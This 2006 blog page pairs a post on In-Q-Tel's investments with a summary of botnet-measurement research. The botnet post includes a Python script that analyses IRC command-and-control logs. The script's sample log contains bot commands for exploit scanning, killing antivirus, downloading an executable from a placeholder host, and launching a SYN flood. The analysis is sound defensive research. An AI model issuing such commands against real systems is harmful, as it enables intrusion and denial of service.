Monday, October 16, 2006

CIA's In-Q-Tel Investments Portfolio

In a previous post "Aha, a Backdoor!" I discussed the "exemption" of publicly traded companies from reporting to the SEC in the usual way, particularly for their investments related to national security. The strategy is visionary enough to act as a major incentive for companies to both innovate and supply the homeland security and defense markets.

However, publicly obtainable data can still reveal historical developments:

"A relatively unknown branch of the CIA is investing millions of taxpayer dollars in technology startups that, together, paint a map for the future of spying. Some of these technologies can pry into the personal lives of Americans not just for the government but for big businesses as well.

The CIA's venture capitalist arm, In-Q-Tel, has invested at least $185 million in startups since 1999, molding these companies' products into technologies the intelligence community can use.

More than 60 percent of In-Q-Tel’s current investments are in companies that specialize in automatically collecting, sifting through and understanding oceans of information, according to an analysis by the Medill School of Journalism. While In-Q-Tel has successfully helped push data analysis technology ahead, implementing it within the government for national security remains a challenge, and one of In-Q-Tel’s former CEOs, Gilman Louie, has concerns about whether privacy and civil liberties will be protected."

In a related Red Herring article, In-Q-Tel points out that:

"We don’t just invest in equity of companies,” said Scott Yancey, the firm’s interim chief executive. “That’s kind of the hallmark of who we are in terms of being the strategic investor.”

Observers said the payments don’t fit with the typical venture model.

“To the extent that In-Q-Tel incentivizes its portfolio companies or employees otherwise, it sounds like from an outsider’s point of view that they’ve needed to create some artificial incentives that wouldn’t otherwise be necessary in a traditional venture model,” said Scott Joachim, a partner with the law firm Drinker, Biddle, & Reath."


The Intelligence Community realizes that innovation will come from outsiders working for insiders, and with "more than 130 technology solutions to the intelligence community", CIA's In-Q-Tel seems to have made quite a few sound investments.

A true angel investor in the "silent war". And yes, even you can submit a business plan in search of seed capital -- and get a "tail" to make sure you're developing in the right direction?

Observing and Analyzing Botnets

Informative and rich in visual material, this research presents "A Multifaceted Approach to Understanding the Botnet Phenomenon":

"Throughout a period of more than three months, we used this infrastructure to track 192 unique IRC botnets of size ranging from a few hundred to several thousand infected end-hosts. Our results show that botnets represent a major contributor to unwanted Internet traffic—27% of all malicious connection attempts observed from our distributed darknet can be directly attributed to botnet-related spreading activity. Furthermore, we discovered evidence of botnet infections in 11% of the 800,000 DNS domains we examined, indicating a high diversity among botnet victims. Taken as a whole, these results not only highlight the prominence of botnets, but also provide deep insights that may facilitate further research to curtail this phenomenon."

Botnets are often treated as a new phenomenon, but they are not: the distributed computing concepts underneath them have been around for decades. What is new is the scale at which they are measured. Some interesting graphs and observations in this research are:

- Breakdown of scan-related commands seen on tracked botnets during the measurement period
- The percentage of bots that launched the respective services (AV/FW Killer) on the victim machines
- Distribution of exploited hosts extracted from the IRC tracker logs
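The three measurements above are all derived from the commands and replies seen on the tracked IRC control channels. As an added example (not code from the paper or from this blog), here is a small Python script that reproduces two of them over a constructed sample of IRC tracker output: the breakdown of scan-related commands per exploit module, and the share of bots in each botnet that reported launching an AV/firewall killer. The log line format, the channel names, the controller heuristic and the command syntax (loosely modelled on SDBot/Agobot-style ".advscan" and ".secure" commands) are all assumptions of this example; none of the numbers come from the paper's data.

```python
"""Classify bot commands captured from IRC C&C channels and compute per-botnet
breakdowns of the kind the paper reports.  The log format, command names and
all sample values below are assumptions for this example, not the paper's data."""

import re
from collections import Counter, defaultdict

# Constructed sample of IRC tracker output, one PRIVMSG per line, assumed format:
#   <unix-ts> <botnet-id> <nick> PRIVMSG <target> :<text>
# The controller issues prefixed commands in the channel; bots answer in clear.
SAMPLE_LOG = """\
1160000001 net-a master PRIVMSG #c :.advscan lsass 100 5 0 -r -s
1160000002 net-a bot01 PRIVMSG #c :[SCAN]: Random Port Scan started on 10.x.x.x:445
1160000003 net-a bot02 PRIVMSG #c :[SCAN]: Random Port Scan started on 10.x.x.x:445
1160000005 net-a master PRIVMSG #c :.secure
1160000006 net-a bot01 PRIVMSG #c :[SECURE]: Killed AV/FW process avp.exe
1160000007 net-a bot03 PRIVMSG #c :[SECURE]: Killed AV/FW process zonealarm.exe
1160000010 net-a master PRIVMSG #c :.advscan dcom135 50 3 0 -r
1160000011 net-b master PRIVMSG #x :.scan.start 192.168.0.0/16 445
1160000012 net-b bot10 PRIVMSG #x :scanning 192.168.0.0/16:445
1160000013 net-b master PRIVMSG #x :.download http://example.invalid/u.exe
1160000014 net-b bot11 PRIVMSG #x :[DOWNLOAD]: Downloaded 34.5KB to u.exe
1160000015 net-b master PRIVMSG #x :.ddos.syn 203.0.113.9 80 600
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<net>\S+)\s+(?P<nick>\S+)\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)
CMD_PREFIX = ".!~"                       # assumed command prefixes across bot families
SCAN_CMDS = {"advscan", "scan", "scan.start", "scan.startall", "ntscan", "scanall"}
AVKILL_RE = re.compile(r"\[SECURE\]|Killed AV/FW|killed antivirus", re.IGNORECASE)


def parse_log(text):
    """Turn tracker lines into records; lines that are not PRIVMSG (JOIN, PING,
    truncated output) are skipped rather than crashing the run."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = int(rec["ts"])
        rec["cmd"], rec["args"] = None, []
        t = rec["text"]
        if t and t[0] in CMD_PREFIX:
            parts = t[1:].split()
            if parts:
                rec["cmd"] = parts[0].lower()
                rec["args"] = parts[1:]
        records.append(rec)
    return records


def controllers(records):
    """Heuristic: any nick that ever issues a prefixed command is a controller."""
    return {r["nick"] for r in records if r["cmd"]}


def scan_command_breakdown(records):
    """Counter keyed by scan command plus exploit module where the family passes
    one as the first argument (as advscan does), e.g. 'advscan lsass'."""
    counts = Counter()
    for r in records:
        if r["cmd"] in SCAN_CMDS:
            key = r["cmd"]
            if r["cmd"] == "advscan" and r["args"]:
                key = f"advscan {r['args'][0].lower()}"
            counts[key] += 1
    return counts


def av_killer_share(records):
    """Per botnet: (bots that reported killing an AV/FW process, bots seen, percent)."""
    ctl = controllers(records)
    bots, killers = defaultdict(set), defaultdict(set)
    for r in records:
        if r["nick"] in ctl:
            continue
        bots[r["net"]].add(r["nick"])
        if AVKILL_RE.search(r["text"]):
            killers[r["net"]].add(r["nick"])
    return {
        net: (len(killers[net]), len(bots[net]), 100.0 * len(killers[net]) / len(bots[net]))
        for net in bots
    }


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for cmd, n in scan_command_breakdown(recs).most_common():
        print(f"{cmd:20s} {n}")
    for net, (k, total, pct) in av_killer_share(recs).items():
        print(f"{net}: {k}/{total} bots launched an AV/FW killer ({pct:.1f}%)")
```

The controller heuristic is the weak point in practice: a bot that echoes a command string back, or a channel where the botmaster speaks through several nicks, will skew both counts, so on real tracker data the controller set is better taken from channel operator status or from the nicks the tracker itself authenticated against.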

What botnet masters will definitely optimise:
- disinformation about the number and geolocation of infected hosts
- alternative and covert communication channels, as opposed to stripped-down or encrypted IRC sessions
- rethinking the trade-off between performance and stealthiness
- rethinking how to retain the nodes already infected, rather than putting more effort into infecting new ones
- for true competitiveness, weaknesses in anti-virus solutions that allow the code to remain undetected for as long as possible
- checking builds against popular multi-engine test beds such as VirusTotal, so that a payload that goes undetected can be reintroduced immediately

The future of malware is a solid, diverse ecosystem in which researchers, the Pentagon and malware authors are all actively benchmarking and optimising malware, each with separate objectives to achieve.

Go through the previous post "Malware Bot Families, Technology and Trends" if you want to find out more about botnet technologies, and catch up on the most recent case of DDoS extortion.